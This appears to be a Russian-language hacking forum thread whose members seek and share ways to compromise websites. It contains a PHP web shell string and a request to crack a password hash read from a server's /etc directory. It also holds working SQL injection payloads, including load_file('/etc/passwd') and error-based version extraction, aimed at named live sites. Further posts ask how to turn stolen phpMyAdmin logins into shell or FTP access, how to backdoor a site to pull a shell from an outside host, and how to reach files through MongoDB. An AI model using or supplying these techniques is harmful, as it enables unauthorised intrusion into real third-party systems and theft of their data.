в папке etc есть файлы 13107206.passwd 13240132.passwd diraccess система Linux sh3.ispcluster.com 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u3 x86_64 В файле есть ссылка перейдя по ней просит ввести логин и пасс через яваскрипт в файле 13107206.passwd вот такая инфа 384:$1$wN4OprQ0$OASVwu4Qs6Wc5YNQPRv/q. как я понял первое пользователь второе пароль в хеше, я правельно понял? И как расшифровать этот хеш или подменить!
Есть форма редактирование шаблона из админ панели, когда я вставляю допусти код "<? system($_GET['c']); ?>" он его коверкает и получается ошибка, "Parse error: syntax error, unexpected '[', expecting ')' in /index.php on line 1" и при следующем редактировании шаблона он отображается уже как "<!--? system([c]); ?-->" Как можно обойти? Возможно данный вопрос уже решался, но найти почему-то не смог. Спасибо заранее всем ответившим. Добавлю, код <?php phpinfo(); ?> исполняется нормально
Кто знает есть подробности об этой уязвимости. Есть ли эксплойты? по интернету ничего не нашел, уязвимость вроде критическая. nginx SPDY heap buffer overflow Описание: A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allows remote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with the ngx_http_spdy_module module (which is not compiled by default) and without --with-debug configure option, if the "spdy" option of the "listen" directive is used in a configuration file
есть phpMyAdmin 2.11.11.3 Documentation, не получаеться взломать phpmyadmin, уже перепробовал все что есть в сети кто может помочь?
http://www.veles.km.ua/'" выдаёт Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1 query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1 query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and ison='1' and visible='1' limit 0,1' at line 1 query=select id from deps where link=''"' and ison='1' and visible='1' limit 0,1; сайт уязвим, но havij не может выдрать имя базы. сейчас сканю sqlmap есть идеи?
Руки рулят Code: http://www.veles.km.ua/' and (select 1 from (Select count(*),Concat((select version()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x) --+
Есть много phpmyadmin/ - разных версий. Уже с логинами и паролями. Движек Wordpres Вопрос: 1 - Есть ли возможность - создать из phpmyadmin SMTP сервер 2 - Можно ли как сделать фтп или узнать данные фтп из phpmyadmin/ Спасибо.
1. Если file_priv, то можно постепенно поднимать права до RCE, а там уже делать, что хочется. 2. Только путем чтения конфигов (https://rdot.org/forum/showthread.php?t=741) или вариант выше
Доброе время суток. Я конечно повторяюсь, но потерял тему с этим вопросом. Как пробэкдорить сайт, чтобы после обращения к скрипту - шелл загружался с левого сайта в определенную папку?
Вы наверное про эту тему? https://forum.antichat.ru/threads/307894/ - Не стандартные способы заливки шеллов
Есть доступ к mongodb вроде 2.4 , возможно как-то получить доступ к файлам сайта или залить шел ? Подключаюсь через Robomongo
Доброго времени суток Помогите пожалуйста - пытаюсь изучать различного рода уязвимости - не для баловства, и порчи имущества, а для общего развития на примере уязвимости: Code: http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file(%27/etc/passwd%27),3,4-- каким образом можно раскрыть абсолютный путь сайта ? к примеру все файлы из etc читаются. а как перейти к файлу httpd.conf или каким другим образом из подобного запроса можно раскрыть абсолютный путь к сайту ? большое спасибо
http://wiki.apache.org/httpd/DistrosDefaultLayout Изучи данный материал в помощь. Так же там mysql root узнать пути с ссылкой выше не проблема, и залиться тоже.
